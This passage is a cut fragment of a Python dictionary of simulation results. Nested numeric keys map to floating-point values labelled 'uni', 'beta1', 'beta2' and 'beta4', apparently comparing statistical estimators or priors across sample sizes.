[0.11914662239936859, 1.1278478336983744]}, 10: {'uni': 0.7425459718118043, 'beta1': 0.6837968299663986, 'beta2': 0.8665605066074531, 'beta4': [0.1876384389463847, 1.083397954154307]}}, 100: {1000: {'uni': 0.1487676605580423, 'beta1': 0.02437792836645245, 'beta2': 0.49427790334163363, 'beta4': [0.01703482937216448, 1.399548399765302]}, 750: {'uni': 0.11310232265204254, 'beta1': 0.02524996032593586, 'beta2': 0.5217627256964408, 'beta4': [0.01698165245717892, 1.4406554008355783]}, 500: {'uni': 0.11717410083094586, 'beta1': 0.02618543909344974, 'beta2': 0.5383596952242804, 'beta4': [0.023983523561589164, 1.3929126361512172]}, 400: {'uni': 0.119738193458416, 'beta1': 0.02505658785977393, 'beta2': 0.5984167205074813, 'beta4': [0.01926970844980976, 1.4014605002976324]}, 300: {'uni': 0.12233230352897319, 'beta1': 0.030570949763671123, 'beta2': 0.5770761352544695, 'beta4': [0.019784253795192344, 1.4359356389798974]}, 200: {'uni': 0.12207409086081243, 'beta1': 0.02347263628756829, 'beta2': 0.5760897628554611, 'beta4': [0.019990281670087366, 1.3745371518250655]}, 150: {'uni': 0.10542026853254463, 'beta1': 0.02953081474765129, 'beta2': 0.5703573600080448, 'beta4': [0.01916862292541901, 1.2965599971106665]}, 100: {'uni': 0.12606340736638602, 'beta1': 0.029241858812173283, 'beta2': 0.520085462363208, 'beta4': [0.021680149967017056, 1.3380882439868846]}, 75: {'uni': 0.15289116139614062, 'beta1': 0.046818551423756204, 'beta2': 0.5234533249147212, 'beta4': [0.030541975508426033, 1.2737285592668153]}, 50: {'uni': 0.22295673863255383, 'beta1': 0.0777043578096471, 'beta2': 0.5277287922461552, 'beta4': [0.03463272718442295, 1.2507855959253786]}, 30: {'uni': 0.322701566594298, 'beta1': 0.20209878886640079, 'beta2': 0.6446393363434055, 'beta4': [0.057809443205279955, 1.183476927699967]}, 20: {'uni': 0.4881509697552908, 'beta1': 0.32634375809351596, 'beta2': 0.6555377865749321, 'beta4': [0.09881280421760813, 1.1859881340445586]}, 10: {'uni': 0.7185909063724639, 'beta1': 
0.6708907363360799, 'beta2': 0.8168268424612932, 'beta4': [0.1552377656555602, 1.121004193526685]}}, 75: {1000: {'uni': 0.20283838067373647, 'beta1': 0.048429921987961456, 'beta2': 0.5254186618618247, 'beta4': [0.02716958040457032, 1.5310324208557173]}, 750: {'uni': 0.13649456208891103, 'beta1': 0.05990815130918355, 'beta2': 0.6143499171511568, 'beta4': [0.025247761507755824, 1.6218068004006065]}, 500: {'uni': 0.17357469505108555, 'beta1': 0.04911574923950298, 'beta2': 0.5392298327482756, 'beta4': [0.025313183659280477, 1.5098847201105141]}, 400: {'uni': 0.1696292678007163, 'beta1': 0.04567710550047028, 'beta2': 0.531791431252953, 'beta4': [0.02843317204287415, 1.511767668283802]}, 300: {'uni': 0.15649352627564092, 'beta1': 0.052458117800853014, 'beta2': 0.6238230721412571, 'beta4': [0.024980744864881454, 1.448139383334922]}, 200: {'uni': 0.16000482751565392, 'beta1': 0.04812942180105504, 'beta2': 0.6848305198014162, 'beta4': [0.026321896909384607, 1.3985133907539185]}, 150: {'uni': 0.21512892236445738, 'beta1': 0.04170656196537403, 'beta2': 0.6484101556394571, 'beta4': [0.028292107396516844, 1.4960535034185667]}, 100: {'uni': 0.17047052520864803, 'beta1': 0.04434589905934036, 'beta2': 0.6147353576676836, 'beta4': [0.031896789192913104, 1.395203205943251]}, 75: {'uni': 0.15498526288207984, 'beta1': 0.05584692512943298, 'beta2': 0.6237541924317974, 'beta4': [0.02517618697832332, 1.3245769159326284]}, 50: {'uni': 0.26311823368421094, 'beta1': 0.08632237956112145, 'beta2': 0.5711379680106714, 'beta4': [0.04746092000571327, 1.3617429879333032]}, 30: {'uni': 0.36091090034892204, 'beta1': 0.18600456221710257, 'beta2': 0.6048666597688582, 'beta4': [0.061077535669381317, 1.2677185233169856]}, 20: {'uni': 0.41610718889687526, 'beta1': 0.3481216835860471, 'beta2': 0.6823292535355998, 'beta4': [0.09228201110020866, 1.2376222120042897]}, 10: {'uni': 0.7381983047748464, 'beta1': 0.6931366409956315, 'beta2': 0.8379903854497059, 'beta4': [0.16766375232596248, 
1.2030815682204685]}}, 50: {1000: {'uni': 0.30730495204502717, 'beta1': 0.12683774226991987, 'beta2': 0.758295652904777, 'beta4': [0.033995273995958114, 1.6538716994158296]}, 750: {'uni': 0.2748268412061488, 'beta1': 0.08382717056992495, 'beta2': 0.7404913706816707, 'beta4': [0.04268820403356018, 1.6928867889354913]}, 500: {'uni': 0.21407720814314096, 'beta1': 0.10363951921535253, 'beta2': 0.659551205149009, 'beta4': [0.05049658923489535, 1.6751311937416606]}, 400: {'uni': 0.24125970025430582, 'beta1': 0.08123246944687809, 'beta2': 0.8628937525700389, 'beta4': [0.05894238702800365, 1.5997778968369727]}, 300: {'uni': 0.22589766382811063, 'beta1': 0.09942885166527134, 'beta2': 0.7532476283115479, 'beta4': [0.04082381032197537, 1.6868673631889013]}, 200: {'uni': 0.2591850579641999, 'beta1': 0.08728773319618409, 'beta2': 0.9235193570611554, 'beta4': [0.04818549496425245, 1.6588257461274114]}, 150: {'uni': 0.2556506895317946, 'beta1': 0.0750813441904301, 'beta2': 0.7289289852709729, 'beta4': [0.03313187544593835, 1.6253850040214513]}, 100: {'uni': 0.22229774262566845, 'beta1': 0.0811448635916027, 'beta2': 0.9098362902991676, 'beta4': [0.03530222422489702, 1.5256474346104436]}, 75: {'uni': 0.2521735586774331, 'beta1': 0.09746447495069399, 'beta2': 0.7259112629043855, 'beta4': [0.03833690135899138, 1.5441263026950591]}, 50: {'uni': 0.2616930090766834, 'beta1': 0.14123441320732333, 'beta2': 0.7728043037823017, 'beta4': [0.03330514564613822, 1.4984785036564114]}, 30: {'uni': 0.3777369219546949, 'beta1': 0.3181138500578289, 'beta2': 0.8227214613274908, 'beta4': [0.0647326450741752, 1.4293026049607784]}, 20: {'uni': 0.43054757894409096, 'beta1': 0.3589568856858122, 'beta2': 0.7092031874212259, 'beta4': [0.08521969621604755, 1.3592456219745106]}, 10: {'uni': 0.7193676569866309, 'beta1': 0.654002177380139, 'beta2': 1.0551759887242254, 'beta4': [0.17405948907032012, 1.291814832800615]}}, 30: {1000: {'uni': 0.39051571889875925, 'beta1': 0.3225844223634567, 'beta2': 
0.9035558894765073, 'beta4': [0.07704160115380267, 2.227381034694318]}, 750: {'uni': 0.5419984090402282, 'beta1': 0.21755538971134444, 'beta2': 0.899954144980397, 'beta4': [0.07004875190766695, 2.1477522364679]}, 500: {'uni': 0.4412079869283692, 'beta1': 0.22030317510188066, 'beta2': 0.9843616821005815, 'beta4': [0.07667967917770555, 1.9841297602015278]}, 400: {'uni': 0.5283629457513818, 'beta1': 0.2598066986086734, 'beta2': 0.8073163609237236, 'beta4': [0.06868678999251733, 2.072822244613063]}, 300: {'uni': 0.40263354028046217, 'beta1': 0.3001142440813251, 'beta2': 1.0046350150005576, 'beta4': [0.06557265592267082, 1.9586311124743965]}, 200: {'uni': 0.48134354695262954, 'beta1': 0.2392909536632273, 'beta2': 0.8273194635401119, 'beta4': [0.0581293469539461, 2.4265465242403392]}, 150: {'uni': 0.4319884313883664, 'beta1': 0.2294040890895637, 'beta2': 1.1418184324337164, 'beta4': [0.0571712560341279, 1.961245075770029]}, 100: {'uni': 0.41615600361788385, 'beta1': 0.26525536184211057, 'beta2': 1.079616181101069, 'beta4': [0.056515735143493694, 1.931223027967923]}, 75: {'uni': 0.5236506770132945, 'beta1': 0.4363272030509452, 'beta2': 0.8886165139035214, 'beta4': [0.07388529678184698, 2.1557067095437286]}, 50: {'uni': 0.6456493007017982, 'beta1': 0.2258459736242775, 'beta2': 0.9869185679088074, 'beta4': [0.07918643195511797, 1.769894900611441]}, 30: {'uni': 0.6312440269318761, 'beta1': 0.3874385917123824, 'beta2': 1.0616086354633982, 'beta4': [0.05954207845456959, 1.7604364861764141]}, 20: {'uni': 0.6104126181929235, 'beta1': 0.44559241884185424, 'beta2': 1.0365435872862463, 'beta4': [0.08444149538359204, 1.7089844645029653]}, 10: {'uni': 0.8451737140836733, 'beta1': 0.6917216817713429, 'beta2': 1.1455529117074295, 'beta4': [0.16205765465380548, 1.5093854292414484]}}, 20: {1000: {'uni': 0.8509864153912471, 'beta1': 0.5927515923267968, 'beta2': 1.354526814588536, 'beta4': [0.10563809568972533, 2.780136454569248]}, 750: {'uni': 0.7237563241854266, 'beta1': 
0.4880530526732574, 'beta2': 1.3754270885330822, 'beta4': [0.11608747683938342, 2.3901377175273506]}, 500: {'uni': 0.7349098763088299, 'beta1': 0.77443020708596, 'beta2': 1.2995200030374383, 'beta4': [0.08306485481040625, 2.6259561040708594]}, 400: {'uni': 0.7638265439803422, 'beta1': 0.6462529311821992, 'beta2': 1.365105079340537, 'beta4': [0.0805276337368694, 2.9074523976944744]}, 300: {'uni': 0.6816219037194299, 'beta1': 0.9804111288462322, 'beta2': 1.3313766997426972, 'beta4': [0.10612186307108695, 2.3843697448899444]}, 200: {'uni': 0.5998893893985328, 'beta1': 0.5778379418103702, 'beta2': 1.396354902148294, 'beta4': [0.08999830370109724, 2.4110667278922406]}, 150: {'uni': 0.797984421533202, 'beta1': 0.7635119755558982, 'beta2': 1.187222514137199, 'beta4': [0.10856175212215503, 2.247413871208628]}, 100: {'uni': 0.8434139646946303, 'beta1': 0.5937542903575364, 'beta2': 1.6481711418029505, 'beta4': [0.10151763893978771, 2.2184136229062994]}, 75: {'uni': 0.7748853594262961, 'beta1': 0.664001314818624, 'beta2': 1.2569773830418571, 'beta4': [0.08736838782029115, 2.443966471445661]}, 50: {'uni': 0.6555728754658805, 'beta1': 0.9684915231136594, 'beta2': 1.2968657616883206, 'beta4': [0.10161338208896606, 2.182760554868553]}, 30: {'uni': 0.7083642351575556, 'beta1': 0.6515567893677615, 'beta2': 1.5238104034879336, 'beta4': [0.0947380293078371, 2.1689469958482914]}, 20: {'uni': 0.7698390858433307, 'beta1': 0.475054994726419, 'beta2': 1.2097144464959995, 'beta4': [0.1081789146585546, 1.9020833213197117]}, 10: {'uni': 0.7904674928158877, 'beta1': 0.949332463180755, 'beta2': 1.2485380080685293, 'beta4': [0.16929713985789144, 1.7918637142720673]}}, 10: {1000: {'uni': 2.020480490053906, 'beta1': 7.10721041709354, 'beta2': 2.5389968592417067, 'beta4': [0.18067848144370124, 4.323777699457079]}, 750: {'uni': 1.8352667947476462, 'beta1': 2.6434476210102633, 'beta2': 2.2530690225728245, 'beta4': [0.1947084612587166, 5.370382453225991]}, 500: {'uni': 3.4985999712865055, 'beta1': 
2.6981020235784237, 'beta2': 2.7496782818831824, 'beta4': [0.17891534759810027, 4.506976439308247]}, 400: {'uni': 1.833890959291033, 'beta1': 3.4840986435598715, 'beta2': 2.6642714750900427, 'beta4': [0.2058070804280337, 6.517500096750502]}, 300: {'uni': 2.0147647645387217, 'beta1': 2.7229813555334967, 'beta2': 4.346111089370431, 'beta4': [0.1782410384933214, 4.701824532323007]}, 200: {'uni': 1.7663283518203157, 'beta1': 3.11879869260279, 'beta2': 2.540152495390496, 'beta4': [0.2166114012627128, 4.820017824394071]}, 150: {'uni': 2.0095640832399875, 'beta1': 2.9419595624093864, 'beta2': 2.724688157226053, 'beta4': [0.17215587940898358, 4.66355299910067]}, 100: {'uni': 2.4042834119544807, 'beta1': 2.352950768311206, 'beta2': 2.2814604833627694, 'beta4': [0.18527457231348213, 4.377326443901522]}, 75: {'uni': 2.716863274826222, 'beta1': 4.822313759516299, 'beta2': 2.6674769462538004, 'beta4': [0.21543589699842206, 4.108384140007609]}, 50: {'uni': 2.2468730444488623, 'beta1': 3.483152730839255, 'beta2': 2.568146356363349, 'beta4': [0.16002210596292038, 5.625984340312313]}, 30: {'uni': 2.3701381561805053, 'beta1': 3.3219273109798197, 'beta2': 3.9081160898211027, 'beta4': [0.21947288024784048, 3.484919952253338]}, 20: {'uni': 2.106479401491252, 'beta1': 3.476826223442542, 'beta2': 2.6443039958807697, 'beta4': [0.1931791291006743, 3.2904139525762433]}, 10: {'uni': 1.7163313859785951, 'beta1': 3.4176017442346387, 'beta2': 2.1443609804377814, 'beta4': [0.202020846365801, 3.0372515442974857]}}}, 0.005: {1000: {1000: {'uni': 0.014328099280717366, 'beta1': 0.0004919534897684268, 'beta2': 0.26507968432654655, 'beta4': [0.001982857431591232, 1.071207340663885]}, 750: {'uni': 0.014645931102658792, 'beta1': 0.0004516767324158777, 'beta2': 0.28135025385035284, 'beta4': [0.0023819938907576168, 1.0710979644235907]}, 500: {'uni': 0.0401999123504932, 'beta1': 0.0010098622206039503, 'beta2': 0.26087040771294423, 'beta4': [0.00391322292956706, 1.0602707743351634]}, 400: {'uni': 
0.03859906062661561, 'beta1': 0.0023951491974352618, 'beta2': 0.325410845646177, 'beta4': [0.00431194717597686, 1.0539406068541854]}, 300: {'uni': 0.03961135602832819, 'beta1': 0.004463024128966381, 'beta2': 0.30654953459515155, 'beta4': [0.005887885874932361, 1.0495105539340337]}, 200: {'uni': 0.05328322862904386, 'beta1': 0.00695816954383936, 'beta2': 0.3584887819400396, 'beta4': [0.010031906426799495, 1.0394763617108735]}, 150: {'uni': 0.07991070685839313, 'beta1': 0.01096956639776533, 'beta2': 0.38432269776431915, 'beta4': [0.014212643491827315, 1.035714483334916]}, 100: {'uni': 0.11547898783798272, 'beta1': 0.024911803431916877, 'beta2': 0.4413911056397121, 'beta4': [0.020223936999933474, 1.0295365432573114]}, 75: {'uni': 0.14278860827610332, 'beta1': 0.04111931346005935, 'beta2': 0.48247323124440955, 'beta4': [0.024508730748380864, 1.028521101035791]}, 50: {'uni': 0.22244005356502672, 'beta1': 0.10076678543802904, 'beta2': 0.53887818521626, 'beta4': [0.04406731062769291, 1.0253494243999786]}, 30: {'uni': 0.3457199293022066, 'beta1': 0.18111907291977847, 'beta2': 0.6489180152254685, 'beta4': [0.06329946927410347, 1.0186691429238954]}, 20: {'uni': 0.4321639624206314, 'beta1': 0.31930093433284834, 'beta2': 0.6968358057547454, 'beta4': [0.08748917387005273, 1.0148628000802158]}, 10: {'uni': 0.7535607617244571, 'beta1': 0.6459185759652024, 'beta2': 0.8404608212786704, 'beta4': [0.14874100748788613, 1.0103627959113197]}}, 750: {1000: {'uni': 0.016054643834592864, 'beta1': 0.0005255210796136057, 'beta2': 0.29613016022578065, 'beta4': [0.002569321458361536, 1.0921977757609453]}, 750: {'uni': 0.017565449609493463, 'beta1': 0.00044128146494429657, 'beta2': 0.32596319569610427, 'beta4': [0.0024211193229798614, 1.0837247325988582]}, 500: {'uni': 0.025273388585714537, 'beta1': 0.0012238909965949832, 'beta2': 0.28596633888810613, 'beta4': [0.004706891079404562, 1.0763363258243404]}, 400: {'uni': 0.0284869706662805, 'beta1': 0.003373431089387849, 'beta2': 
0.31160773879605275, 'beta4': [0.004778217415687074, 1.0688815827153706]}, 300: {'uni': 0.051974911880818334, 'beta1': 0.0025953674653235816, 'beta2': 0.35487660596973497, 'beta4': [0.0057040189841521954, 1.0645206895209334]}, 200: {'uni': 0.057787227888696155, 'beta1': 0.008594698361171204, 'beta2': 0.33464364516433065, 'beta4': [0.008915943193690542, 1.058535030341485]}, 150: {'uni': 0.1072577046248855, 'beta1': 0.008954930631785816, 'beta2': 0.3547962531903187, 'beta4': [0.014926190566390659, 1.0451050889459255]}, 100: {'uni': 0.10866795713543598, 'beta1': 0.021365150417910553, 'beta2': 0.408057891802109, 'beta4': [0.01995689778854479, 1.0427691805903552]}, 75: {'uni': 0.1515930948295423, 'beta1': 0.0471416864069456, 'beta2': 0.4622290961298072, 'beta4': [0.033113111249531646, 1.0347147013802995]}, 50: {'uni': 0.22238209797127031, 'beta1': 0.09411440367183642, 'beta2': 0.5492704161662795, 'beta4': [0.04003882098404763, 1.03710679974761]}, 30: {'uni': 0.36495749036912684, 'beta1': 0.20588432683378366, 'beta2': 0.63948653203891, 'beta4': [0.053653553378636976, 1.0243617060340924]}, 20: {'uni': 0.4884959323661349, 'beta1': 0.30666472361293534, 'beta2': 0.7081435215673421, 'beta4': [0.07540684280791501, 1.020569046057047]}, 10: {'uni': 0.6968386619986449, 'beta1': 0.6811799241679843, 'beta2': 0.8553586319565165, 'beta4': [0.15249709600683814, 1.0142223850662149]}}, 500: {1000: {'uni': 0.02390920295425466, 'beta1': 0.0010562525829358833, 'beta2': 0.28768678189795666, 'beta4': [0.004312024387535537, 1.1489861120864775]}, 750: {'uni': 0.02364967452116205, 'beta1': 0.0013663794051884156, 'beta2': 0.3059833791245982, 'beta4': [0.0037397623064582357, 1.125354161378425]}, 500: {'uni': 0.027171446923213848, 'beta1': 0.0014895968977017358, 'beta2': 0.32175550025195343, 'beta4': [0.004058092086363399, 1.1107301691353542]}, 400: {'uni': 0.03183194238950928, 'beta1': 0.0020434543150262266, 'beta2': 0.31271219509470577, 'beta4': [0.004795694763576324, 1.1285307153481872]}, 300: 
{'uni': 0.03915870533550215, 'beta1': 0.002891114208307802, 'beta2': 0.3374659826961455, 'beta4': [0.009481642046035186, 1.1000575313033538]}, 200: {'uni': 0.05918013749289809, 'beta1': 0.00571396543076984, 'beta2': 0.3642424794285678, 'beta4': [0.008165969887847468, 1.0779103780685995]}, 150: {'uni': 0.08913468389043425, 'beta1': 0.013857796694830497, 'beta2': 0.36670305795462654, 'beta4': [0.013510229542809978, 1.0704422729330318]}, 100: {'uni': 0.10962684237002224, 'beta1': 0.025601470186866964, 'beta2': 0.41964378122965873, 'beta4': [0.02140079956143495, 1.0615497788178276]}, 75: {'uni': 0.16410321919833215, 'beta1': 0.036565104170381946, 'beta2': 0.4483370318574912, 'beta4': [0.025341038030251152, 1.0519482474243165]}, 50: {'uni': 0.23214158365024107, 'beta1': 0.07759808681388385, 'beta2': 0.5409699810844546, 'beta4': [0.03698440051989314, 1.045002808918023]}, 30: {'uni': 0.36866261035341547, 'beta1': 0.1615745284530632, 'beta2': 0.6000774443252743, 'beta4': [0.06503567790681813, 1.036549927349429]}, 20: {'uni': 0.5142807096062043, 'beta1': 0.3709377892635338, 'beta2': 0.6687577103009485, 'beta4': [0.09190174832036048, 1.0294336844120058]}, 10: {'uni': 0.6676276934998603, 'beta1': 0.6031823674458175, 'beta2': 0.8504156545798995, 'beta4': [0.15410271127453445, 1.0248849403515385]}}, 400: {1000: {'uni': 0.02893756653890583, 'beta1': 0.0024708098532196816, 'beta2': 0.35317007637931086, 'beta4': [0.005840162737584066, 1.1458782759009223]}, 750: {'uni': 0.029772953579492705, 'beta1': 0.0025813101021306246, 'beta2': 0.33581836617716804, 'beta4': [0.00515663755940367, 1.1544432713432045]}, 500: {'uni': 0.026373683744683594, 'beta1': 0.0012817539679130607, 'beta2': 0.3206528709629913, 'beta4': [0.006340143273613668, 1.1259949309060133]}, 400: {'uni': 0.028870605255494165, 'beta1': 0.0017583836928871455, 'beta2': 0.3345485197465399, 'beta4': [0.0049145410619623065, 1.1313262140962277]}, 300: {'uni': 0.037631574659545766, 'beta1': 0.003314104667762801, 'beta2': 
0.3739031457830798, 'beta4': [0.006628311781369157, 1.1244848630571982]}, 200: {'uni': 0.05818960792147371, 'beta1': 0.006414447500778574, 'beta2': 0.34785104123458455, 'beta4': [0.010347124650326254, 1.1055988963642294]}, 150: {'uni': 0.06686629124379927, 'beta1': 0.010473443536135857, 'beta2': 0.3711187401000779, 'beta4': [0.01737674940997798, 1.0894763594747867]}, 100: {'uni': 0.11042615577766349, 'beta1': 0.021440842781902242, 'beta2': 0.4194431482280291, 'beta4': [0.020167807881497756, 1.0720999951903198]}, 75: {'uni': 0.17234535024501574, 'beta1': 0.04888178853521142, 'beta2': 0.44258791900978556, 'beta4': [0.024666584013382783, 1.0724976966026734]}, 50: {'uni': 0.20747390135121996, 'beta1': 0.10412610029786912, 'beta2': 0.5214455501618365, 'beta4': [0.03647333118409969, 1.054845362239509]}, 30: {'uni': 0.323080761682041, 'beta1': 0.1910703286553347, 'beta2': 0.5895460490280188, 'beta4': [0.07318268072463806, 1.047335158479478]}, 20: {'uni': 0.425104439432341, 'beta1': 0.31288400955871687, 'beta2': 0.660810228645866, 'beta4': [0.09528909385922078, 1.0367863357961702]}, 10: {'uni': 0.7978419703610078, 'beta1': 0.6535599792905803, 'beta2': 0.8606946260002006, 'beta4': [0.1559615213065441, 1.0262921049491547]}}, 300: {1000: {'uni': 0.03617128520734348, 'beta1': 0.005295932115668975, 'beta2': 0.3953652729378721, 'beta4': [0.0077996963164763365, 1.198423568016775]}, 750: {'uni': 0.03370212655005886, 'beta1': 0.003406479786029501, 'beta2': 0.33283985486640805, 'beta4': [0.006246338063993741, 1.1688992556321924]}, 500: {'uni': 0.03733598381117172, 'beta1': 0.002690213582744608, 'beta2': 0.32679970881106063, 'beta4': [0.0072746227056809725, 1.1815977716399453]}, 400: {'uni': 0.037609473359047664, 'beta1': 0.0030367027449007575, 'beta2': 0.31301244809282824, 'beta4': [0.007004909388070732, 1.1535355373438279]}, 300: {'uni': 0.04866436408185673, 'beta1': 0.005036968714659069, 'beta2': 0.39337778376104543, 'beta4': [0.006593818546016198, 1.1471357754823057]}, 200: 
{'uni': 0.06691519284441158, 'beta1': 0.012088429889848653, 'beta2': 0.411545693440886, 'beta4': [0.00925915149648542, 1.1467683642662987]}, 150: {'uni': 0.08013870806087241, 'beta1': 0.012928591505765686, 'beta2': 0.3639915988699613, 'beta4': [0.013545098748925637, 1.112941475607728]}, 100: {'uni': 0.11915204806596211, 'beta1': 0.020560796608724338, 'beta2': 0.43513333320171427, 'beta4': [0.024870502434082297, 1.101010773135631]}, 75: {'uni': 0.15380764367109265, 'beta1': 0.052743721971365606, 'beta2': 0.477437577043614, 'beta4': [0.025753188654213978, 1.096656178793653]}, 50: {'uni': 0.21634860989228755, 'beta1': 0.10387426914262873, 'beta2': 0.5267676741342504, 'beta4': [0.0336359638147702, 1.0756656338476558]}, 30: {'uni': 0.329104913600056, 'beta1': 0.2119333657379465, 'beta2': 0.5795669522760784, 'beta4': [0.05880821427631558, 1.0573282739845435]}, 20: {'uni': 0.4440546212288396, 'beta1': 0.33225105400565214, 'beta2': 0.7033791372197638, 'beta4': [0.09446679633215929, 1.0452682420079284]}, 10: {'uni': 0.6700468460734627, 'beta1': 0.6423991037463385, 'beta2': 0.8209898707066139, 'beta4': [0.14614716121509172, 1.0368350386240601]}}, 200: {1000: {'uni': 0.055678760865024414, 'beta1': 0.007958611327107352, 'beta2': 0.3616812080853317, 'beta4': [0.009650760728049683, 1.2737715811614496]}, 750: {'uni': 0.06253429328064883, 'beta1': 0.007052014486479158, 'beta2': 0.3727602445915611, 'beta4': [0.013907566868759703, 1.2455156544743298]}, 500: {'uni': 0.056629728333709814, 'beta1': 0.007236990383308722, 'beta2': 0.4378412955709138, 'beta4': [0.008915720861055711, 1.2396638343497217]}, 400: {'uni': 0.06557818408133465, 'beta1': 0.008559725754195417, 'beta2': 0.4022416830536871, 'beta4': [0.008720624487697483, 1.2242496161641432]}, 300: {'uni': 0.055653765135356484, 'beta1': 0.010716858079046102, 'beta2': 0.40777043770500154, 'beta4': [0.013037868268656936, 1.1945048646946044]}, 200: {'uni': 0.07406809444327488, 'beta1': 0.00871994028403354, 'beta2': 0.43397543608537975, 
'beta4': [0.010133665874696609, 1.183136623171022]}, 150: {'uni': 0.07579453587538967, 'beta1': 0.016690794496607576, 'beta2': 0.38707637478822926, 'beta4': [0.012003777291769832, 1.1607492057108946]}, 100: {'uni': 0.1330117692754952, 'beta1': 0.0273137396681669, 'beta2': 0.4639958863729501, 'beta4': [0.01718866277831865, 1.1529289387642288]}, 75: {'uni': 0.16284219430179553, 'beta1': 0.05374597722028761, 'beta2': 0.46276207823889204, 'beta4': [0.0212354062721255, 1.1433215554102738]}, 50: {'uni': 0.21676977749720733, 'beta1': 0.10705646819292171, 'beta2': 0.4962386395407797, 'beta4': [0.0424490148625437, 1.106642687778397]}, 30: {'uni': 0.3232291639799789, 'beta1': 0.21990639926403363, 'beta2': 0.6287500118287891, 'beta4': [0.06227333917623599, 1.0852347913639224]}, 20: {'uni': 0.4741588995975893, 'beta1': 0.3180055211757256, 'beta2': 0.6997497503888488, 'beta4': [0.08910550204088843, 1.073553657215182]}, 10: {'uni': 0.7060034832794384, 'beta1': 0.7535719832598702, 'beta2': 0.836970960678481, 'beta4': [0.15463124862968708, 1.061123889701544]}}, 150: {1000: {'uni': 0.09755029708902496, 'beta1': 0.013371380424273176, 'beta2': 0.4904883791446505, 'beta4': [0.014485120313771681, 1.3263298856392054]}, 750: {'uni': 0.07935627239599896, 'beta1': 0.014498726584143962, 'beta2': 0.4032213903162674, 'beta4': [0.01453548924940545, 1.312319935889472]}, 500: {'uni': 0.07940335531678129, 'beta1': 0.013532193951838856, 'beta2': 0.43737767914012077, 'beta4': [0.012086410300407132, 1.292089639338192]}, 400: {'uni': 0.08510558470918518, 'beta1': 0.013814146505550512, 'beta2': 0.4322597292778953, 'beta4': [0.011514722775333443, 1.2679672672520583]}, 300: {'uni': 0.07050546141892267, 'beta1': 0.013721651466435995, 'beta2': 0.4772443440959037, 'beta4': [0.013048563921660452, 1.275168506879035]}, 200: {'uni': 0.07212522306921464, 'beta1': 0.014794794920315857, 'beta2': 0.4182389641782459, 'beta4': [0.012330051449758477, 1.223055546001289]}, 150: {'uni': 0.0880530466181019, 'beta1': 
0.01637038391386567, 'beta2': 0.4016620386283008, 'beta4': [0.015981031730102176, 1.2058441135701794]}, 100: {'uni': 0.10437092139348636, 'beta1': 0.042125959393999324, 'beta2': 0.4180395651716391, 'beta4': [0.018238525075653742, 1.1892200376979478]}, 75: {'uni': 0.1354097789470845, 'beta1': 0.04466340448885708, 'beta2': 0.4719502510414126, 'beta4': [0.029031453045082974, 1.1842822424503554]}, 50: {'uni': 0.2321223950706905, 'beta1': 0.1000673436975513, 'beta2': 0.5419923580903283, 'beta4': [0.04560941534187873, 1.1404594681712081]}, 30: {'uni': 0.3398043685756915, 'beta1': 0.20164768345364828, 'beta2': 0.5973341709232525, 'beta4': [0.05850641234359622, 1.1190533719391869]}, 20: {'uni': 0.42530652623250753, 'beta1': 0.33972887071420993, 'beta2': 0.6661734761601139, 'beta4': [0.0866818884666435, 1.1036146702573584]}, 10: {'uni': 0.7206486942031576, 'beta1': 0.6682818489256517, 'beta2': 0.8203819752573837, 'beta4': [0.1457856061570244, 1.0782841756806698]}}, 100: {1000: {'uni': 0.12225970876711711, 'beta1': 0.026865924786776484, 'beta2': 0.5481932843224591, 'beta4': [0.021249975024392645, 1.4458803198625023]}, 750: {'uni': 0.10432288378851975, 'beta1': 0.01938410759360099, 'beta2': 0.5174008910203534, 'beta4': [0.020650675251219643, 1.400096753320331]}, 500: {'uni': 0.10980786444942221, 'beta1': 0.046045147980126745, 'beta2': 0.4872619282673519, 'beta4': [0.020216014505271482, 1.34415766866211]}, 400: {'uni': 0.11830943122090917, 'beta1': 0.022610702506398205, 'beta2': 0.48432204455605576, 'beta4': [0.020746831022585423, 1.3579130782794564]}, 300: {'uni': 0.1301564606268183, 'beta1': 0.03017686908257779, 'beta2': 0.49504127235180784, 'beta4': [0.017718462476249502, 1.3626289526025477]}, 200: {'uni': 0.10317650157447253, 'beta1': 0.031018838197086084, 'beta2': 0.5827841182143911, 'beta4': [0.01835643401415011, 1.3438136723439953]}, 150: {'uni': 0.1223846100192758, 'beta1': 0.029879335127678274, 'beta2': 0.5409671366968559, 'beta4': [0.01954089865119265, 
1.368437090606529]}, 100: {'uni': 0.12961477120291165, 'beta1': 0.03162701397748519, 'beta2': 0.5639520142257836, 'beta4': [0.017002122681775672, 1.3145981538380391]}, 75: {'uni': 0.17353671304347995, 'beta1': 0.047537565730464616, 'beta2': 0.5761043512638573, 'beta4': [0.027716532256132305, 1.2441854959216505]}, 50: {'uni': 0.24826276887242338, 'beta1': 0.08558962844244324, 'beta2': 0.533915471627432, 'beta4': [0.03863914801170205, 1.218517497159898]}, 30: {'uni': 0.37180952980211535, 'beta1': 0.21095614373881763, 'beta2': 0.6001047101242712, 'beta4': [0.055670631983699946, 1.2205675047970168]}, 20: {'uni': 0.5332463734790038, 'beta1': 0.3122699052968921, 'beta2': 0.6825479362346901, 'beta4': [0.1007635027564815, 1.1578526542019671]}, 10: {'uni': 0.7827438334815844, 'beta1': 0.667689009954351, 'beta2': 0.8475596342444666, 'beta4': [0.14486763242884407, 1.141064060957981]}}, 75: {1000: {'uni': 0.13934776917850505, 'beta1': 0.03613172510974446, 'beta2': 0.5412943561883247, 'beta4': [0.027239243280109772, 1.4730726636218179]}, 750: {'uni': 0.16768552393257194, 'beta1': 0.04411635102462327, 'beta2': 0.5665863137587445, 'beta4': [0.026435978717218058, 1.50426942823365]}, 500: {'uni': 0.24455944319130382, 'beta1': 0.05406680626221278, 'beta2': 0.5394359340277001, 'beta4': [0.027135290145289204, 1.5051667579504118]}, 400: {'uni': 0.15461074078236603, 'beta1': 0.05661127214288521, 'beta2': 0.5887256535284988, 'beta4': [0.03600603252919621, 1.478513973879563]}, 300: {'uni': 0.1920855608409181, 'beta1': 0.03925990146874738, 'beta2': 0.630763663206618, 'beta4': [0.025894458672085747, 1.4794655207279226]}, 200: {'uni': 0.1591107285954601, 'beta1': 0.04254459738815162, 'beta2': 0.6307198306870676, 'beta4': [0.02985877018033198, 1.530765493767434]}, 150: {'uni': 0.14590438734222005, 'beta1': 0.04466619164761486, 'beta2': 0.6173909230664805, 'beta4': [0.026438835998575785, 1.5522769250395467]}, 100: {'uni': 0.16386720848409753, 'beta1': 0.034581214946180605, 'beta2': 
